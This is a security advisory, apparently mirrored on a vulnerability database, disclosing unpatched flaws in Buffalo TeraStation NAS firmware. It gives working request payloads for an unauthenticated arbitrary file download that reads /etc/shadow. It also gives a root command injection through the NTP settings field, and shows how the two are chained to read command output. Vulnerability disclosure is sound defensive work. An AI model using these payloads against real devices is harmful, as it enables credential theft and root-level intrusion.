Lucene search
K

Buffalo TeraStation TS-Series Command Execution

🗓️ 30 Jan 2013 00:00:00Reported by Andrea FabriziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Buffalo TeraStation TS-Series multiple vulnerabilities, firmware version <= 1.5.7, unpatche

Code
`**************************************************************  
Title: Buffalo TeraStation TS-Series multiple vulnerabilities  
Version affected: firmware version <= 1.5.7  
Vendor: http://www.buffalotech.com/products/network-storage  
Discovered by: Andrea Fabrizi  
Email: [email protected]  
Web: http://www.andreafabrizi.it  
Twitter: @andreaf83  
Status: unpatched  
**************************************************************  
  
Buffalo's TeraStation network attached storage (NAS) solutions offer  
centralized storage and backup for home, small office and business  
needs.  
  
The firmware is based on Linux ARM and most of the internal software  
is written using Perl.  
  
The vulnerabilities that I found allows any unauthenticated attacker  
to access arbitrary files on the NAS filesystem and execute system  
commands with root privileges.  
  
Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with  
the latest firmware installed (v1.57). Surely other versions with the  
same firmware are vulnerable.  
  
1]======== sync.cgi unauthenticated arbitrary file download ========  
Requesting an unprotected cgi, it's possible, for an unauthenticated  
user, to download any system file, included /etc/shadow, that contains  
the password shadows for the application/system users.  
  
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow  
  
Moreover, using the key "all" it's possible to download the entire  
/var/log directory:  
  
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all  
  
2]======== dynamic.pl NTP command injection ========  
This vulnerability allows authenticated users to execute arbitrary  
commands on the system with root privileges.  
  
This is a sample request:  
#####################################  
POST /dynamic.pl HTTP/1.1  
Content-Length: 89  
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0  
  
bufaction=setDTSettings&dateMethod=on  
&ip=www.google.it%26%26[COMMAND]>/tmp/output  
&syncFreq=1d  
#####################################  
  
It's possible to view the command output using the previous  
vulnerability (reading the /tmp/output file).  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation